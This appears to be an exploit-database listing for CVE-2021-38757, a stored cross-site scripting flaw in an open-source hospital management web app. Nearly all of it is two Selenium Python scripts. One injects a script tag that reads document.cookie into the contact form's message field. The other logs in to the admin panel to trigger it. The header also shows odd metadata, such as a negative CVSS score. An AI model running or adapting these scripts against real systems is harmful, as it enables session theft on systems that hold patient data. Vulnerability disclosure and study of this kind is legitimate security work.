Exploit for Hospital Management System Cross Site Scripting CVE-2021-38757

Name: Exploit for Hospital Management System Cross Site Scripting CVE-2021-38757
Rating: 5 (165 reviews)
2021-08-18 | CVSS -0.1
## https://sploitus.com/exploit?id=PACKETSTORM:163869
# Exploit Title: XSS-Stored PHPSESSID user PWNED on Hospital Management System Vulnerable parameter "txtMsg" on contact  
# Author: nu11secur1ty  
# Testing and Debugging: nu11secur1ty  
# Date: 08.17.2021  
# Vendor: https://github.com/kishan0725/Hospital-Management-System  
# Link: https://github.com/kishan0725/Hospital-Management-System  
# CVE: CVE-2021-38757  
  
[+] Exploit Source:  
  
### P0C  
  
#!/usr/bin/python3  
# Author: @nu11secur1ty  
# Debug and Developement: @nu11secur1ty  
# CVE-2021-38757  
  
from selenium import webdriver  
import time  
import os  
  
#enter the link to the website you want to automate login.  
website_link="  
http://192.168.1.3/Hospital-Management-System-master/contact.html"  
  
  
browser = webdriver.Chrome()  
browser.get((website_link))  
  
try:  
## The Exploit  
browser.execute_script("document.querySelector('[name=\"txtName\"]').value=\"User\"")  
browser.execute_script("document.querySelector('[name=\"txtEmail\"]').value=\"  
taratora@abv.bg\"")  
browser.execute_script("document.querySelector('[name=\"txtPhone\"]').value=\"1234567890\"")  
browser.execute_script("document.querySelector('[name=\"txtPhone\"]').value=\"1234567890\"")  
browser.execute_script("document.querySelector('[name=\"txtMsg\"]').value=\"nu11secur1ty<script>alert(document.cookie)</script>\"")  
  
## submit the exploit  
browser.execute_script("document.querySelector('[name=\"btnSubmit\"]').click()")  
  
# Check  
os.system("python PoC-CVE-2021-38757-Check.py")  
  
print("The payload for CVE CVE-2021-38757 is deployed...\n")  
  
except Exception:  
#### This exception occurs if the element are not found in the webpage.  
print("Some error occured :(")  
  
### Ch3ck  
  
#!/usr/bin/python3  
# Author: @nu11secur1ty  
# Debug and Developement: @nu11secur1ty  
# CVE-2021-38757  
  
from selenium import webdriver  
import time  
  
  
#enter the link to the website you want to automate login.  
website_link="  
http://192.168.1.3/Hospital-Management-System-master/index1.php"  
  
#enter your login username  
username="tarator@abv.bg"  
  
#enter your login password  
password="password"  
  
#enter the element for username input field  
element_for_username="email"  
#enter the element for password input field  
element_for_password="password2"  
#enter the element for submit button  
element_for_submit="patsub"  
  
browser = webdriver.Chrome()  
browser.get((website_link))  
  
try:  
username_element = browser.find_element_by_name(element_for_username)  
username_element.send_keys(username)  
password_element = browser.find_element_by_name(element_for_password)  
password_element.send_keys(password)  
signInButton = browser.find_element_by_name(element_for_submit)  
signInButton.click()  
  
# Check  
time.sleep(3)  
browser.maximize_window()  
browser.get(("  
http://192.168.1.3/Hospital-Management-System-master/admin-panel1.php#"))  
  
print("The payload for CVE CVE-2021-38757 is deployed...\n")  
  
except Exception:  
#### This exception occurs if the element are not found in the webpage.  
print("Some error occured :(")  
  
  
----------------------------------------------------------------------------------------  
  
# Reproduce:  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38757  
# Proof: https://streamable.com/6xue3b  
# BR nu11secur1ty